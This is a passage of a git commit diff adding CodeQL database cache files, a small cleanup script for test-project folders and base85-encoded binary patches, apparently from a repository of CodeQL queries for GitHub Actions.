db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#2# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#1# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119#0#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TContent create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TContent#0#s create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit#0# create mode 100644 db/db-yaml/default/cache/pages/01.pack create mode 100644 db/db-yaml/default/cache/pages/01.pack.d create mode 100644 db/db-yaml/default/cache/pages/02.pack create mode 100644 db/db-yaml/default/cache/pages/08.pack create mode 100644 db/db-yaml/default/cache/pages/09.pack create mode 100644 db/db-yaml/default/cache/pages/09.pack.d create mode 100644 db/db-yaml/default/cache/pages/0b.pack create mode 100644 db/db-yaml/default/cache/pages/0b.pack.d create mode 100644 db/db-yaml/default/cache/pages/0d.pack create mode 100644 db/db-yaml/default/cache/pages/17.pack create mode 100644 db/db-yaml/default/cache/pages/17.pack.d create mode 100644 db/db-yaml/default/cache/pages/20.pack create mode 100644 db/db-yaml/default/cache/pages/20.pack.d create mode 100644 db/db-yaml/default/cache/pages/24.pack create mode 100644 db/db-yaml/default/cache/pages/24.pack.d create mode 100644 db/db-yaml/default/cache/pages/26.pack create mode 100644 db/db-yaml/default/cache/pages/26.pack.d create mode 100644 db/db-yaml/default/cache/pages/27.pack create mode 100644 db/db-yaml/default/cache/pages/27.pack.d create mode 100644 db/db-yaml/default/cache/pages/29.pack create mode 100644 db/db-yaml/default/cache/pages/2b.pack create mode 100644 db/db-yaml/default/cache/pages/2d.pack create mode 100644 db/db-yaml/default/cache/pages/33.pack create mode 100644 db/db-yaml/default/cache/pages/33.pack.d create mode 100644 db/db-yaml/default/cache/pages/37.pack create mode 100644 db/db-yaml/default/cache/pages/37.pack.d create mode 100644 db/db-yaml/default/cache/pages/3c.pack create mode 100644 db/db-yaml/default/cache/pages/3c.pack.d create mode 100644 db/db-yaml/default/cache/pages/42.pack create mode 100644 db/db-yaml/default/cache/pages/42.pack.d create mode 100644 db/db-yaml/default/cache/pages/45.pack create mode 100644 db/db-yaml/default/cache/pages/45.pack.d create mode 100644 db/db-yaml/default/cache/pages/46.pack create mode 100644 db/db-yaml/default/cache/pages/4c.pack create mode 100644 db/db-yaml/default/cache/pages/4c.pack.d create mode 100644 db/db-yaml/default/cache/pages/4d.pack create mode 100644 db/db-yaml/default/cache/pages/4d.pack.d create mode 100644 db/db-yaml/default/cache/pages/4e.pack create mode 100644 db/db-yaml/default/cache/pages/4e.pack.d create mode 100644 db/db-yaml/default/cache/pages/54.pack create mode 100644 db/db-yaml/default/cache/pages/55.pack create mode 100644 db/db-yaml/default/cache/pages/5d.pack create mode 100644 db/db-yaml/default/cache/pages/62.pack create mode 100644 db/db-yaml/default/cache/pages/6a.pack create mode 100644 db/db-yaml/default/cache/pages/6f.pack create mode 100644 db/db-yaml/default/cache/pages/6f.pack.d create mode 100644 db/db-yaml/default/cache/pages/7a.pack create mode 100644 db/db-yaml/default/cache/pages/7a.pack.d create mode 100644 db/db-yaml/default/cache/pages/7b.pack create mode 100644 db/db-yaml/default/cache/pages/7b.pack.d create mode 100644 db/db-yaml/default/cache/pages/84.pack create mode 100644 db/db-yaml/default/cache/pages/84.pack.d create mode 100644 db/db-yaml/default/cache/pages/88.pack create mode 100644 db/db-yaml/default/cache/pages/88.pack.d create mode 100644 db/db-yaml/default/cache/pages/93.pack create mode 100644 db/db-yaml/default/cache/pages/96.pack create mode 100644 db/db-yaml/default/cache/pages/96.pack.d create mode 100644 db/db-yaml/default/cache/pages/9e.pack create mode 100644 db/db-yaml/default/cache/pages/9e.pack.d create mode 100644 db/db-yaml/default/cache/pages/a1.pack create mode 100644 db/db-yaml/default/cache/pages/a3.pack create mode 100644 db/db-yaml/default/cache/pages/a3.pack.d create mode 100644 db/db-yaml/default/cache/pages/aa.pack create mode 100644 db/db-yaml/default/cache/pages/aa.pack.d create mode 100644 db/db-yaml/default/cache/pages/b5.pack create mode 100644 db/db-yaml/default/cache/pages/bd.pack create mode 100644 db/db-yaml/default/cache/pages/c2.pack create mode 100644 db/db-yaml/default/cache/pages/d0.pack create mode 100644 db/db-yaml/default/cache/pages/d0.pack.d create mode 100644 db/db-yaml/default/cache/pages/d5.pack create mode 100644 db/db-yaml/default/cache/pages/d6.pack create mode 100644 db/db-yaml/default/cache/pages/d6.pack.d create mode 100644 db/db-yaml/default/cache/pages/d7.pack create mode 100644 db/db-yaml/default/cache/pages/d7.pack.d create mode 100644 db/db-yaml/default/cache/pages/df.pack create mode 100644 db/db-yaml/default/cache/pages/e1.pack create mode 100644 db/db-yaml/default/cache/pages/e9.pack create mode 100644 db/db-yaml/default/cache/pages/e9.pack.d create mode 100644 db/db-yaml/default/cache/pages/f3.pack create mode 100644 db/db-yaml/default/cache/pages/f3.pack.d create mode 100644 db/db-yaml/default/cache/pages/f6.pack create mode 100644 db/db-yaml/default/cache/pages/fc.pack create mode 100644 db/db-yaml/default/cache/pages/fc.pack.d create mode 100644 db/db-yaml/default/cache/pages/fd.pack create mode 100644 db/db-yaml/default/cache/predicates/00.pack create mode 100644 db/db-yaml/default/cache/predicates/01.pack create mode 100644 db/db-yaml/default/cache/predicates/02.pack create mode 100644 db/db-yaml/default/cache/predicates/04.pack create mode 100644 db/db-yaml/default/cache/predicates/06.pack create mode 100644 db/db-yaml/default/cache/predicates/07.pack create mode 100644 db/db-yaml/default/cache/predicates/08.pack create mode 100644 db/db-yaml/default/cache/predicates/09.pack create mode 100644 db/db-yaml/default/cache/predicates/18.pack create mode 100644 db/db-yaml/default/cache/predicates/1b.pack create mode 100644 db/db-yaml/default/cache/predicates/1c.pack create mode 100644 db/db-yaml/default/cache/predicates/1f.pack create mode 100644 db/db-yaml/default/cache/predicates/22.pack create mode 100644 db/db-yaml/default/cache/predicates/24.pack create mode 100644 db/db-yaml/default/cache/predicates/25.pack create mode 100644 db/db-yaml/default/cache/predicates/26.pack create mode 100644 db/db-yaml/default/cache/predicates/27.pack create mode 100644 db/db-yaml/default/cache/predicates/28.pack create mode 100644 db/db-yaml/default/cache/predicates/29.pack create mode 100644 db/db-yaml/default/cache/predicates/2a.pack create mode 100644 db/db-yaml/default/cache/predicates/2d.pack create mode 100644 db/db-yaml/default/cache/predicates/2e.pack create mode 100644 db/db-yaml/default/cache/predicates/2f.pack create mode 100644 db/db-yaml/default/cache/predicates/32.pack create mode 100644 db/db-yaml/default/cache/predicates/3a.pack create mode 100644 db/db-yaml/default/cache/predicates/3c.pack create mode 100644 db/db-yaml/default/cache/predicates/42.pack create mode 100644 db/db-yaml/default/cache/predicates/48.pack create mode 100644 db/db-yaml/default/cache/predicates/49.pack create mode 100644 db/db-yaml/default/cache/predicates/4c.pack create mode 100644 db/db-yaml/default/cache/predicates/4e.pack create mode 100644 db/db-yaml/default/cache/predicates/55.pack create mode 100644 db/db-yaml/default/cache/predicates/57.pack create mode 100644 db/db-yaml/default/cache/predicates/58.pack create mode 100644 db/db-yaml/default/cache/predicates/59.pack create mode 100644 db/db-yaml/default/cache/predicates/5a.pack create mode 100644 db/db-yaml/default/cache/predicates/5f.pack create mode 100644 db/db-yaml/default/cache/predicates/60.pack create mode 100644 db/db-yaml/default/cache/predicates/62.pack create mode 100644 db/db-yaml/default/cache/predicates/65.pack create mode 100644 db/db-yaml/default/cache/predicates/68.pack create mode 100644 db/db-yaml/default/cache/predicates/69.pack create mode 100644 db/db-yaml/default/cache/predicates/6c.pack create mode 100644 db/db-yaml/default/cache/predicates/6f.pack create mode 100644 db/db-yaml/default/cache/predicates/72.pack create mode 100644 db/db-yaml/default/cache/predicates/73.pack create mode 100644 db/db-yaml/default/cache/predicates/74.pack create mode 100644 db/db-yaml/default/cache/predicates/75.pack create mode 100644 db/db-yaml/default/cache/predicates/77.pack create mode 100644 db/db-yaml/default/cache/predicates/7a.pack create mode 100644 db/db-yaml/default/cache/predicates/7b.pack create mode 100644 db/db-yaml/default/cache/predicates/7c.pack create mode 100644 db/db-yaml/default/cache/predicates/7d.pack create mode 100644 db/db-yaml/default/cache/predicates/7e.pack create mode 100644 db/db-yaml/default/cache/predicates/82.pack create mode 100644 db/db-yaml/default/cache/predicates/86.pack create mode 100644 db/db-yaml/default/cache/predicates/87.pack create mode 100644 db/db-yaml/default/cache/predicates/88.pack create mode 100644 db/db-yaml/default/cache/predicates/89.pack create mode 100644 db/db-yaml/default/cache/predicates/8d.pack create mode 100644 db/db-yaml/default/cache/predicates/8f.pack create mode 100644 db/db-yaml/default/cache/predicates/91.pack create mode 100644 db/db-yaml/default/cache/predicates/95.pack create mode 100644 db/db-yaml/default/cache/predicates/97.pack create mode 100644 db/db-yaml/default/cache/predicates/98.pack create mode 100644 db/db-yaml/default/cache/predicates/99.pack create mode 100644 db/db-yaml/default/cache/predicates/9c.pack create mode 100644 db/db-yaml/default/cache/predicates/9d.pack create mode 100644 db/db-yaml/default/cache/predicates/9e.pack create mode 100644 db/db-yaml/default/cache/predicates/a0.pack create mode 100644 db/db-yaml/default/cache/predicates/a2.pack create mode 100644 db/db-yaml/default/cache/predicates/a4.pack create mode 100644 db/db-yaml/default/cache/predicates/a8.pack create mode 100644 db/db-yaml/default/cache/predicates/a9.pack create mode 100644 db/db-yaml/default/cache/predicates/aa.pack create mode 100644 db/db-yaml/default/cache/predicates/ad.pack create mode 100644 db/db-yaml/default/cache/predicates/ae.pack create mode 100644 db/db-yaml/default/cache/predicates/b0.pack create mode 100644 db/db-yaml/default/cache/predicates/b2.pack create mode 100644 db/db-yaml/default/cache/predicates/b5.pack create mode 100644 db/db-yaml/default/cache/predicates/b8.pack create mode 100644 db/db-yaml/default/cache/predicates/bd.pack create mode 100644 db/db-yaml/default/cache/predicates/c1.pack create mode 100644 db/db-yaml/default/cache/predicates/c4.pack create mode 100644 db/db-yaml/default/cache/predicates/ca.pack create mode 100644 db/db-yaml/default/cache/predicates/cb.pack create mode 100644 db/db-yaml/default/cache/predicates/cc.pack create mode 100644 db/db-yaml/default/cache/predicates/cd.pack create mode 100644 db/db-yaml/default/cache/predicates/d2.pack create mode 100644 db/db-yaml/default/cache/predicates/d5.pack create mode 100644 db/db-yaml/default/cache/predicates/d8.pack create mode 100644 db/db-yaml/default/cache/predicates/dc.pack create mode 100644 db/db-yaml/default/cache/predicates/de.pack create mode 100644 db/db-yaml/default/cache/predicates/df.pack create mode 100644 db/db-yaml/default/cache/predicates/e0.pack create mode 100644 db/db-yaml/default/cache/predicates/e3.pack create mode 100644 db/db-yaml/default/cache/predicates/e4.pack create mode 100644 db/db-yaml/default/cache/predicates/e6.pack create mode 100644 db/db-yaml/default/cache/predicates/ec.pack create mode 100644 db/db-yaml/default/cache/predicates/ed.pack create mode 100644 db/db-yaml/default/cache/predicates/ee.pack create mode 100644 db/db-yaml/default/cache/predicates/f0.pack create mode 100644 db/db-yaml/default/cache/predicates/f2.pack create mode 100644 db/db-yaml/default/cache/predicates/f3.pack create mode 100644 db/db-yaml/default/cache/predicates/f6.pack create mode 100644 db/db-yaml/default/cache/predicates/f7.pack create mode 100644 db/db-yaml/default/cache/predicates/fa.pack create mode 100644 db/db-yaml/default/cache/predicates/fb.pack create mode 100644 db/db-yaml/default/cache/predicates/fc.pack create mode 100644 db/db-yaml/default/cache/predicates/ff.pack create mode 100644 db/db-yaml/default/cache/relations/07.pack create mode 100644 db/db-yaml/default/cache/relations/0a.pack create mode 100644 db/db-yaml/default/cache/relations/0c.pack create mode 100644 db/db-yaml/default/cache/relations/0d.pack create mode 100644 db/db-yaml/default/cache/relations/12.pack create mode 100644 db/db-yaml/default/cache/relations/13.pack create mode 100644 db/db-yaml/default/cache/relations/14.pack create mode 100644 db/db-yaml/default/cache/relations/19.pack create mode 100644 db/db-yaml/default/cache/relations/1d.pack create mode 100644 db/db-yaml/default/cache/relations/1e.pack create mode 100644 db/db-yaml/default/cache/relations/22.pack create mode 100644 db/db-yaml/default/cache/relations/2b.pack create mode 100644 db/db-yaml/default/cache/relations/32.pack create mode 100644 db/db-yaml/default/cache/relations/35.pack create mode 100644 db/db-yaml/default/cache/relations/52.pack create mode 100644 db/db-yaml/default/cache/relations/5a.pack create mode 100644 db/db-yaml/default/cache/relations/60.pack create mode 100644 db/db-yaml/default/cache/relations/65.pack create mode 100644 db/db-yaml/default/cache/relations/6e.pack create mode 100644 db/db-yaml/default/cache/relations/71.pack create mode 100644 db/db-yaml/default/cache/relations/73.pack create mode 100644 db/db-yaml/default/cache/relations/76.pack create mode 100644 db/db-yaml/default/cache/relations/78.pack create mode 100644 db/db-yaml/default/cache/relations/81.pack create mode 100644 db/db-yaml/default/cache/relations/86.pack create mode 100644 db/db-yaml/default/cache/relations/8a.pack create mode 100644 db/db-yaml/default/cache/relations/92.pack create mode 100644 db/db-yaml/default/cache/relations/9a.pack create mode 100644 db/db-yaml/default/cache/relations/9d.pack create mode 100644 db/db-yaml/default/cache/relations/a9.pack create mode 100644 db/db-yaml/default/cache/relations/aa.pack create mode 100644 db/db-yaml/default/cache/relations/ac.pack create mode 100644 db/db-yaml/default/cache/relations/b3.pack create mode 100644 db/db-yaml/default/cache/relations/b4.pack create mode 100644 db/db-yaml/default/cache/relations/b6.pack create mode 100644 db/db-yaml/default/cache/relations/b8.pack create mode 100644 db/db-yaml/default/cache/relations/bf.pack create mode 100644 db/db-yaml/default/cache/relations/c4.pack create mode 100644 db/db-yaml/default/cache/relations/c7.pack create mode 100644 db/db-yaml/default/cache/relations/ca.pack create mode 100644 db/db-yaml/default/cache/relations/cd.pack create mode 100644 db/db-yaml/default/cache/relations/d1.pack create mode 100644 db/db-yaml/default/cache/relations/d6.pack create mode 100644 db/db-yaml/default/cache/relations/dc.pack create mode 100644 db/db-yaml/default/cache/relations/e3.pack create mode 100644 db/db-yaml/default/cache/relations/ee.pack create mode 100644 db/db-yaml/default/cache/relations/f1.pack create mode 100644 db/db-yaml/default/cache/relations/f7.pack create mode 100644 db/db-yaml/default/cache/relations/f9.pack create mode 100644 db/db-yaml/default/cache/relations/fd.pack create mode 100644 db/db-yaml/default/cache/version create mode 100644 db/db-yaml/default/containerparent.rel create mode 100644 db/db-yaml/default/containerparent.rel.checksum create mode 100644 db/db-yaml/default/files.rel create mode 100644 db/db-yaml/default/files.rel.checksum create mode 100644 db/db-yaml/default/folders.rel create mode 100644 db/db-yaml/default/folders.rel.checksum create mode 100644 db/db-yaml/default/locations_default.rel create mode 100644 db/db-yaml/default/locations_default.rel.checksum create mode 100644 db/db-yaml/default/pools/0/buckets/info create mode 100644 db/db-yaml/default/pools/0/buckets/page-000000 create mode 100644 db/db-yaml/default/pools/0/info create mode 100644 db/db-yaml/default/pools/0/metadata/info create mode 100644 db/db-yaml/default/pools/0/metadata/page-000000 create mode 100644 db/db-yaml/default/pools/0/pageDump/page-000000000 create mode 100644 db/db-yaml/default/pools/1/buckets/info create mode 100644 db/db-yaml/default/pools/1/buckets/page-000000 create mode 100644 db/db-yaml/default/pools/1/ids1/info create mode 100644 db/db-yaml/default/pools/1/ids1/page-000000 create mode 100644 db/db-yaml/default/pools/1/indices1/info create mode 100644 db/db-yaml/default/pools/1/indices1/page-000000 create mode 100644 db/db-yaml/default/pools/1/info create mode 100644 db/db-yaml/default/pools/1/metadata/info create mode 100644 db/db-yaml/default/pools/1/metadata/page-000000 create mode 100644 db/db-yaml/default/pools/1/pageDump/page-000000000 create mode 100644 db/db-yaml/default/pools/poolInfo create mode 100644 db/db-yaml/default/sourceLocationPrefix.rel create mode 100644 db/db-yaml/default/sourceLocationPrefix.rel.checksum create mode 100644 db/db-yaml/default/strings/0/buckets/page-000000 create mode 100644 db/db-yaml/default/strings/0/metadata/page-000000 create mode 100644 db/db-yaml/default/strings/0/pageDump/page-000000000 create mode 100644 db/db-yaml/default/yaml.rel create mode 100644 db/db-yaml/default/yaml.rel.checksum create mode 100644 db/db-yaml/default/yaml_locations.rel create mode 100644 db/db-yaml/default/yaml_locations.rel.checksum create mode 100644 db/db-yaml/default/yaml_scalars.rel create mode 100644 db/db-yaml/default/yaml_scalars.rel.checksum create mode 100755 db/db-yaml/yaml.dbscheme create mode 100644 db/diagnostic/cli-diagnostics-add-20240301T120559.348Z.json create mode 100644 db/diagnostic/cli-diagnostics-add-20240301T120600.004Z.json create mode 100644 db/log/database-create-20240301.130558.279.log create mode 100644 db/log/database-index-files-20240301.130558.974.log create mode 100644 db/src.zip delete mode 100644 ql/lib/codeql/actions/ast/internal/Actions.qll delete mode 100644 ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml diff --git a/clean.sh b/clean.sh new file mode 100755 index 00000000000..e0458a639e3 --- /dev/null +++ b/clean.sh @@ -0,0 +1,2 @@ +#! /bin/bash +find . -type d -name "*testproj*" -exec rm -r {} + diff --git a/db/baseline-info.json b/db/baseline-info.json new file mode 100644 index 00000000000..9e26dfeeb6e --- /dev/null +++ b/db/baseline-info.json @@ -0,0 +1 @@ +{} \ No newline at end of file diff --git a/db/codeql-database.yml b/db/codeql-database.yml new file mode 100644 index 00000000000..b4f4f83a0bc --- /dev/null +++ b/db/codeql-database.yml @@ -0,0 +1,10 @@ +--- +sourceLocationPrefix: /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 +baselineLinesOfCode: 0 +unicodeNewlines: false +columnKind: utf16 +primaryLanguage: yaml +creationMetadata: + cliVersion: 2.16.3 + creationTime: 2024-03-01T12:05:58.598849Z +finalised: true diff --git a/db/db-yaml/default/cache/.lock b/db/db-yaml/default/cache/.lock new file mode 100644 index 00000000000..e69de29bb2d diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/db/db-yaml/default/cache/cached-strings/pools/0/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..18730c0fde8bff9360316792e7fc624a0eb11b31 GIT binary patch literal 40 dcmZQz00Tw{#Q>$5|AY9)YVE5*G-qVtPXH3@7D!>5*2sBPtw$_u9AwYltfm;Rgt;O}83iN3b2Q`kR1PBn= q7WlR=ynCQ6yfzkgteh7p=PPJHfB*pk1PBlyK!5-N0t5&U2nBv=1^^uZ literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/db/db-yaml/default/cache/cached-strings/pools/0/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..cdc1fce921e1ec68dee4f29b72b971f0fdb4b568 GIT binary patch literal 40 dcmZQz00Tw{#Q>!l|AY8qIiasXbR^@!VgM!p1XBP2 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 b/db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..beddaa49503d6dec5c59de7ecc00a9708acf7cb5 GIT binary patch literal 8192 zcmeIvu?@f=5CcG@?7tpUB#>;7mexWbild_V$LL&&vrFK)b|uM41)6SBvS_|e`1Xn2 z=#z$Hfmb)N*~*1`=;IsiD>J=KfB*pk1PBlyK!5-N0t5&UAV7cs0RjXFoF(uBW0VGi literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/db/db-yaml/default/cache/cached-strings/pools/0/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..58e30ec6a2083023e4053ebcf641455326100eed GIT binary patch literal 40 dcmZQz00Tw{#Q>!l|AY987KiD8==$?#g#jx11o!{| literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 b/db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..192298b641249e0a6510b5651c13ac89edb888c0 GIT binary patch literal 8192 zcmeIuF$%yi2nEojN!$D1xEaOGB?S7M6uv00HML7%>^kI5SzwkoEK~$~C7iN%nvLfO rJm_7~nL6~7rrJ)M|A@%~T literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/db/db-yaml/default/cache/cached-strings/pools/0/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..91c5a22d6a9c8b47601f5b914ac023ee18b307e8 GIT binary patch literal 40 ccmZQz00Tw{#Q>wFLHyVmSBpUO+=*um0UuWch5!Hn literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..05f3c4f61992be3e1d87d17db392618d8b233d4f GIT binary patch literal 8192 zcmeIuu?>Py7)9Zi5KtqKSeaN@V@F3rMaKXXjNuGcmM&mr2LrGH2?M;Aj!IAy2k;sl zf%3fMCjZInK4Xk=wd1Astn<5<>iAX;cXgn9qlF7U8r6HmTam z|G%@v>8Z}tTkYDo?Mux=009ILKmY**5I_I{1Q0*~0R#|0009ILKmY**5I_I{1Q0*~ Hf%yeKFK{SlQt|X#lguJW%>FbJn&sdk-^1a5C$5?Af z*EnDD7|x~UN1016v4*A9mdDa^>T9)by_ISD#lNGFZp+*ULx2DQ0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk 